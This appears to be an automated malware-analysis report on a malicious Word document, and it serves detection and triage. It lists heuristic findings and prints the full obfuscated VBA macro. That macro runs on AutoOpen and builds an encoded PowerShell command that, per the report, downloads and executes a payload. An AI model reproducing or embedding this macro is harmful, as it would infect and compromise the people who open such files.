MALICIOUS
212
Risk Score
Malware Insights
MITRE ATT&CK
T1566.001 Spearphishing Attachment
T1204.002 Malicious File
The sample is a malicious Word document containing a VBA macro. The macro is obfuscated but reconstructs a PowerShell command that downloads and executes a payload from a specific URL. This indicates a downloader or droppers functionality, likely delivered via spearphishing.
Heuristics 8
-
ClamAV: Doc.Dropper.Agent-6585082-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6585082-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBAMatched line in script
UdiiRq = CDate(21486) dZXHGZOTbli = JWfjWFJjn + Shell(qMudJiVWLsS + swdXCutRW + TEAvnTCCUSV, 19592 - 19592) uIJcU = CByte(TLTkr) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
End Function Sub AutoOpen() On Error Resume Next -
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11484 bytes |
SHA-256: 501cdf5c7c991ccd04b633a56757deec924f9d2d91f13470cd088b6e90cce831 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
164 of 341 identifiers look randomly generated (e.g. 'bVYipwkDvDU'); 3 string-concatenation chain(s) — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "IFXRNqtz"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "LbwcJFwT"
Function EDaTqlzhW()
On Error Resume Next
lzSDjT = CDate(dklACN + Sin(21671 + 51402) * 79117 * CInt(93264))
jkGKN = KSfOLj
kuiEC = 9589
Hirrw = CByte(qrXnu)
hiOTZ = 79677
NCDrw = CDate(42789)
EaiJk = "Ower" + "SHell &( $" + "pSHom" + "e[21" + "]+$psHOmE[30]+" + "'x')( " + Chr(34) + "$(SEt-iTEM " + " '" + "VaRIAbLe:OF" + "s' "
zrAzQ = CDate(IWjEH + Sin(29613 + 48149) * 72560 * CInt(59865))
wZWRwh = oImwkv
KYOaGG = 43186
jAnNHj = CByte(lhalj)
CXDQh = 17164
OnTRDi = CDate(36691)
NbjVt = "'')" + Chr(34) + " " + "+[STRING]( '11" + "@97," + "122w95w64s" + "123L85@1" + "5L18e15A65A7"
IDWpl = CDate(pJjjWK + Sin(84016 + 35851) * 38305 * CInt(54364))
pYKBt = KZWLc
NqjHPA = 42815
RTcIsS = CByte(MBXRwM)
ocUtFL = 47120
iEXbYB = CDate(69809)
abwwNVowQYR = "4M" + "88,2A64" + "L77,6" + "9@74e76L91M15"
QmGvq = CDate(IdnKCf + Sin(64870 + 44148) * 45162 * CInt(642))
oQuqUv = kanSXJ
DhvXrq = 70821
CzLkvY = CByte(dZKOnM)
wjamM = 9322
OXNas = CDate(8968)
luiYSALFAW = "e9" + "3w78G65L" + "75@64G66L" + "20s11@105k1" + "06" + "L96A69M67@76s1" + "5,18@15," + "65k74"
zHkKv = CDate(jrUqh + Sin(91473 + 69786) * 53849 * CInt(91526))
bAofVV = pVvip
FYZAmz = 24329
isrXV = CByte(cKLwrJ)
kvIGI = 18445
QLpFd = CDate(86813)
brwzkplvHz = "G88L2A64A" + "77e69e74s76" + "G91k15" + "e12" + "4@86,9" + "2G91L7" + "4e66" + "s1s97@"
svpAZt = CDate(58757)
uYpbSY = CDate(vZXdkj + Sin(87061 + 52093) * 48675 * CInt(41342))
HjbRC = 71434
VOvZiU = CByte(NEoNi)
GFapG = 95927
UvWqUt = jdMqbs
litMEjsVp = "74M91@1w12" + "0e74G77@108G6" + "7,70,74M" + "65A91G20" + "M11M92w120@"
muaFw = CDate(58732)
iaSlS = CDate(iZSEL + Sin(5209 + 18238) * 55583 * CInt(67434))
vdRfR = 68586
zzTQii = CByte(iNDEw)
MhnOT = 43036
sawOjX = WlKwiA
iGkUbcP = "106L90k78" + "@15" + "s18,15A8M71A91," + "91L95s21L0k0w" + "75w64s67,90k" + "64,65s72w71G7" + "0s74e90G94A" + "90" + "@7"
HaAYPr = CDate(57153)
uJMzJ = CDate(oPkHhd + Sin(68581 + 46356) * 46861 * CInt(52339))
izHzzQ = 18014
BmYDQh = CByte(BQlGjv)
RPmrO = 81450
VhfWdN = ljpjwb
ERbhoW = "8A1,76w64,66M0" + "e122A12" + "5@103w75" + "k122A1" + "24k127e123@85A2" + "2s0A111L71G" + "91k"
EDaTqlzhW = EaiJk + NbjVt + abwwNVowQYR + luiYSALFAW + brwzkplvHz + litMEjsVp + iGkUbcP + ERbhoW
End Function
Function iwTjjPcLoSw()
On Error Resume Next
LamIQ = CDate(17565)
QOzjJ = CDate(QzfSVc + Sin(28970 + 70851) * 37046 * CInt(36441))
XCNAB = 96752
RQjCZ = CByte(uJwsRw)
PEksrl = 5914
dZmGH = taSQH
LcCiA = "91e95w21w0" + "@0s9" + "2," + "86A65A74w93L7" + "2L86@76L" + "78G95e70k"
GqUJA = CDate(30150)
lkXzQ = CDate(CkkOJ + Sin(56258 + 71856) * 43465 * CInt(70433))
DtoXz = 58497
WpjpsI = CByte(irWAIz)
UOwOR = 71473
bOojas = qcFOz
wLFZibk = "91" + "A78@67M1k69L9" + "5@0s" + "95k103A101" + "G126,103,127s2" + "5@0A111k" + "71w9"
sOhWLm = CDate(10271)
QAMOTl = CDate(clmhEj + Sin(73306 + 26909) * 97132 * CInt(95491))
JpcHi = 88061
HrfMh = CByte(EtuLj)
YLqHf = 32371
jbzaUl = isqbTR
ZLsTkwr = "1w91" + "M95w" + "21e0,0e88M88@8" + "8G1k66L74@64" + "A71" + "A78A86A7" + "7@64e91"
psoARV = CDate(22475)
UvGSjz = CDate(kVSNHG + Sin(43994 + 72852) * 81784 * CInt(85924))
wqcHHi = 53391
GAiYS = CByte(dkpfa)
mSvmKt = 31197
wQvaAc = kDDCb
KRlIaBGzfF = "e90w70k1M7" + "6M64e66w0,94G1" + "02e91" + "G69" + "k104k102@0k1"
wwhiu = CDate(54839)
oKkbwc = CDate(jvCLd + Sin(18823 + 72631) * 20120 * CInt(71064))
SUsPXS = 37205
SHzIW = CByte(vkuvi)
VuriP = 65425
ESTQXK = PPCvWm
bVYipwkDvDU = "11k7" + "1M91L91M" + "95L21e0M0@70" + "s95k71s64L65s74" + "G92A1s77s70" + "s7" + "5e0e10"
hZHJI = CDate(84566)
iSHvCQ = CDate(nAaXc + Sin(16763 + 94315) * 89875 * CInt(51329))
BfTqzi = 67823
UblLl = CByte(bIKRzs)
jqqtj = 4813
LBjul = MPpTTF
srDrrR = "1M72,105" + "e124L" + "92" + "s89@75,28k" + "0s111@71" + "w91A91@95k2" + "1k0s0" + "w8" + "8G" + "88L"
fNwjho = CDate(87782)
lPNsGS = CDate(jFGdz + Sin(36721 + 85158) * 10752 * CInt(9328))
qIVao = 16371
tXjOmz = CByte(zHLvzk)
TqMmU = 2279
GNjjiw = RaLuYq
ZzzcVlrqz = "88e1M64M66e" + "90G9" + "3L66k78k68w70L" + "65@78" + ",1G65e74G91s0k" + "106M31L126G87G" + "70@24,70A12" + "1M107k12" + "4e0e8w1s124"
GIHPzJ = CDate(13424)
GkDnN = CDate(oHZJRd + Sin(98384 + 47428) * 74637 * CInt(64345))
tfubFp = 38658
bmHrCa = CByte(KwGQba)
qKjUjX = 76591
jrfOfD = TNYlT
zMUCKYj = ",95e" + "67w70k91" + "w7w8w" + "111L8e6M"
TAIDni = CDate(36273)
zirPt = CDate(UzJXw + Sin(92643 + 29661) * 43727 * CInt(63433))
MuVqh = 14989
wjiVZ = CByte(SRbsaj)
CwoCz = 3890
PuPXsF = GqJvMl
MzqOHbN = "20A11w70G95" + "G127,106,69M11" + "0@15s18s15@11A9" + "7A" + "122M9"
iwTjjPcLoSw = LcCiA + wLFZibk + ZLsTkwr + KRlIaBGzfF + bVYipwkDvDU + srDrrR + ZzzcVlrqz + zMUCKYj + MzqOHbN
End Function
Function CGQnwhqVO()
On Error Resume Next
kiHLr = CDate(41139)
HMXiAJ = CDate(OZYoI + Sin(57829 + 10740) * 89675 * CInt(96208))
GjBwUR = 38926
kOzTSn = CByte(SvOrCl)
IZwcdC = 49726
TiIjto = AEjwW
qPuufjp = "5s" + "64w123" + "A85s1w65w74e87" + "s91w7A30"
vcSriP = CDate(27203)
BcsYF = CDate(AddYw + Sin(7401 + 11982) * 94669 * CInt(24727))
SifDVp = 7352
HTpjNr = CByte(MSNYP)
NLmZp = 69981
qcRNm = QdKJW
wTIkAm = "A3G15L27e" + "31L23G27A" + "26" + "L27s6k20k11L117" + "s71w" + "88s101M69s" + "15s18M15" + "@11"
rMONw = CDate(59430)
PRlZOV = CDate(VJiUbA + Sin(6378 + 39492) * 52075 * CInt(7567))
rwIIp = 24589
poZLYz = CByte(LBFwB)
LOTYD = 1230
kYmCKh = oNPfiu
cVCFzKO = "A74w65A89@21L" + "91M74M66" + "w95A15@" + "4,15M8k1"
ZIbpbn = CDate(15144)
lkwXD = CDate(hRrAq + Sin(92344 + 5790) * 76299 * CInt(87922))
CHuBTl = 45630
TWlKP = CByte(GLNHE)
FafdHP = 68531
uXfAEC = QzCXu
KQLBvVkwUc = "15s8w" + "15G" + "4k15" + "M11k70G95" + "s127w1" + "06G69s110" + "A1" + "5w4A15e8@" + "1,"
YBdnmm = CDate(49752)
SvYKS = CDate(PQWQis + Sin(398 + 83381) * 13317 * CInt(73053))
NHOioU = 25901
IvlOi = CByte(EIHLii)
hnFpz = 26097
wKWWWw = FupGlq
JwUTpwqjHpn = "74e87w74e8L20w" + "73,64G93G74e7" + "8G76" + "A71M7@11,118" + "@75L94" + "k64w124k15M" + "70s65G15," + "11G92e120e" + "10"
rEXrIf = CDate(61128)
AEuBH = CDate(bjwhi + Sin(73192 + 3583) * 62197 * CInt(36093))
QNork = 89469
mfjur = CByte(pcDow)
sWfMEf = 98501
IMtjM = jQtAV
JujRwdsirk = "6w" + "90w78A6,84k" + "91G9" + "3G86" + "e84@11k105" + "k106A96" + "A69A6" + "7@76G1G107k64e"
CGQnwhqVO = qPuufjp + wTIkAm + cVCFzKO + KQLBvVkwUc + JwUTpwqjHpn + JujRwdsirk
End Function
Function MPPpmBY()
On Error Resume Next
UiIGCb = CDate(76167)
BShVhk = CDate(dZbDCZ + Sin(25675 + 13667) * 67414 * CInt(7078))
kinSjJ = 60962
JKzLm = CByte(iwlwC)
QEWFUq = 55095
Njnja = dDNGW
fqYqV = "88A65w67,64e" + "78," + "75L105k70M67A74" + "w7@11G118" + "@75e94" + "k6" + "4A124L1e123L64"
dXYHsL = CDate(96808)
UsQGcf = CDate(GiMPP + Sin(57249 + 64741) * 11254 * CInt(68307))
iBdEXK = 86469
VHWZCs = CByte(DnSsZ)
zuTBOG = 36857
iXrSRC = DiAdFz
YRwjaCkL = "L1" + "24G91w93" + "e70A65w72M7A" + "6G3,15w11,117"
DtiiA = CDate(71238)
QUKjqc = CDate(EKpUMw + Sin(41422 + 87482) * 38476 * CInt(9689))
MBzFF = 55672
OvRoL = CByte(nHOCp)
SzUYMp = 7788
QmQLn = wZpQj
bGjBc = "A71e88A10" + "1w69A6M20M124e9" + "1s78A93G" + "91M2M1" + "27@93A6" + "4L76,74e" + "92M92L15A11" + "k117M71e88@1" + "01s69w20L77k9" + "3,74M"
hRnNY = CDate(56214)
XsYIE = CDate(pkEEH + Sin(67743 + 41516) * 21521 * CInt(16017))
aMhJc = 34184
qswJZZ = CByte(jzREh)
YUlzv = 42112
tGGHwN = GIHwi
UoPjbwCOtsG = "78A68A20k82@7" + "6s78s91A76G71e" + "84@88M93s70,91s" + "74,2L71L" + "64L92,91G15G1" + "1L112s1@" + "106M87M76A7" + "4@95L9"
MPPpmBY = fqYqV + YRwjaCkL + bGjBc + UoPjbwCOtsG
End Function
Function nfQMAQ()
On Error Resume Next
zwRHb = CDate(61497)
WjapKM = CDate(BwXKh + Sin(50879 + 94333) * 76740 * CInt(92483))
UnFJkl = 60294
JULuZl = CByte(GRVaKX)
dKzKnl = 71919
IXiNT = ULaCnI
qcIVR = "1," + "70s64,65k" + "1M98L74e92G92" + "k78@7" + "2A74w20" + "L82e82'.sPLIt" + "( ',@AMGekwsL'" + " ) |fOreA" + "CH{ [cha"
FijJR = CDate(85823)
uziPJ = CDate(Kwtwp + Sin(16350 + 96728) * 61128 * CInt(8268))
OZoFV = 96549
cwULA = CByte(wEBWC)
fPWMQE = 31891
ihbIdi = zolff
vJvLinIlVk = "R]($_ -Bx" + "Or '0x2f') })" + " +" + Chr(34) + "$( " + "sEt-ITeM '"
kbXXiW = CDate(27625)
Svhbnn = CDate(WSSNZz + Sin(71280 + 51575) * 63226 * CInt(10316))
jLJpQE = 11670
NEZBv = CByte(bqkbP)
qXuRWw = 26214
faojcp = WJFnlK
SpnQvqXALw = "VARIABlE:Ofs'" + " ' ' ) " + Chr(34) + ")"
nfQMAQ = qcIVR + vJvLinIlVk + SpnQvqXALw
End Function
Function DPvzRwKX()
On Error Resume Next
dQWqJt = CByte(RIrjK)
UlmNzR = CDate(wiKjwU + Sin(89652 + 1800) * 23415 * CInt(35009))
CdIwd = 20777
pMVIJf = 70185
hrLBO = IajfS
SWLcIR = CDate(79386)
PYVzK = CByte(jwcTX)
UaLlV = CDate(oqFQrb + Sin(64227 + 31090) * 88613 * CInt(20793))
LcaTZj = 99709
vZnWMf = 76601
KTUjd = fqHOZ
EXhBf = CDate(6845)
lrqFKM = CByte(qMilq)
rDFVk = CDate(GZKww + Sin(36766 + 98336) * 81069 * CInt(89489))
mzXWQ = 58234
KGNUph = 73908
RIObai = napkYr
fvONP = CDate(4847)
SrNlwz = CByte(AbjJb)
sFiANM = CDate(mKViCM + Sin(5990 + 16151) * 95694 * CInt(44441))
VEFwj = 30247
GdsMN = 23876
vnFFml = FUaaiX
uvVih = CDate(49010)
POmzw = CByte(mlhmTs)
viLvk = CDate(PKmmO + Sin(62289 + 62968) * 46128 * CInt(79780))
kBSqG = 9769
sfFOI = 80581
ndjcc = wFtUr
HrVMc = CDate(95177)
End Function
Function HRzmXFfCT()
On Error Resume Next
zuXmLz = CByte(lhjsU)
GjAXq = CDate(ICzQv + Sin(93893 + 1612) * 41426 * CInt(3899))
hDqMo = 61317
pzUjJs = 25702
HJtzHz = VnDlu
amFBPT = CDate(97927)
zwMcw = UEVKYojKKD + Chr(pWNPFVU + 80 + UsbnzOTkQB)
zXlEk = CByte(uGZAK)
ITbPr = CDate(oKsoIn + Sin(46115 + 24393) * 8293 * CInt(47765))
OUlKj = 70835
hLwicz = 42289
RjKZu = ufwjDs
JiknZ = CDate(25689)
NmwFF = CByte(WtCiN)
wrtjE = CDate(HWEOM + Sin(85303 + 46812) * 56624 * CInt(36190))
ubvNC = 35056
ChKvo = 21302
mzmKK = tAPWp
jjstlS = CDate(26480)
HRzmXFfCT = JGZzCAJ + zwMcw + EDaTqlzhW + iwTjjPcLoSw + CGQnwhqVO + MPPpmBY + nfQMAQ
onSVEC = CByte(jHnfD)
XEQEN = CDate(wSZzj + Sin(95659 + 21279) * 58185 * CInt(11646))
WtMAD = 24262
rSpdf = 32936
tSnHVa = QkOqY
iztUiN = CDate(68270)
End Function
Function uPNmBYfmhC(swdXCutRW)
On Error Resume Next
wFlArL = CByte(Pacwwh)
tUfNWf = CDate(btmHsj + Sin(38703 + 60130) * 56603 * CInt(80993))
CRrtUO = 65036
wzLClF = 74959
oQCPAj = BBwsb
TwSYR = CDate(65143)
BjnVc = CByte(dRbdTz)
URuXDN = CDate(SOiLp + Sin(31775 + 1320) * 41365 * CInt(19991))
jwojp = 83124
FPwjL = 62669
wFTik = RGuzC
UdiiRq = CDate(21486)
dZXHGZOTbli = JWfjWFJjn + Shell(qMudJiVWLsS + swdXCutRW + TEAvnTCCUSV, 19592 - 19592)
uIJcU = CByte(TLTkr)
zITMJ = CDate(UGQaZ + Sin(55010 + 97862) * 68499 * CInt(43356))
tzZdU = 98347
fQPOB = 10042
IwSfuA = wOoBwV
ksdRI = CDate(26080)
End Function
Sub AutoOpen()
On Error Resume Next
ItaNOU = CByte(qiMzN)
IMkiRD = CDate(wvfsz + Sin(17869 + 4896) * 11696 * CInt(90663))
wAWABD = 71437
cQCqk = 90811
iHvKah = ErDwf
wVDXk = CDate(609)
Application.Run zVPatQBiI + "uPNmBYfmhC" + jLNdQkwEa, RNDaibSphk + HRzmXFfCT + XqKdoPud
TzEVr = CByte(cpdEji)
cuSRK = CDate(jlwnmi + Sin(58853 + 66294) * 8424 * CInt(74196))
swLIY = 90630
vHSzr = 10092
GFqmnw = CPZOW
idazNQ = CDate(54298)
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.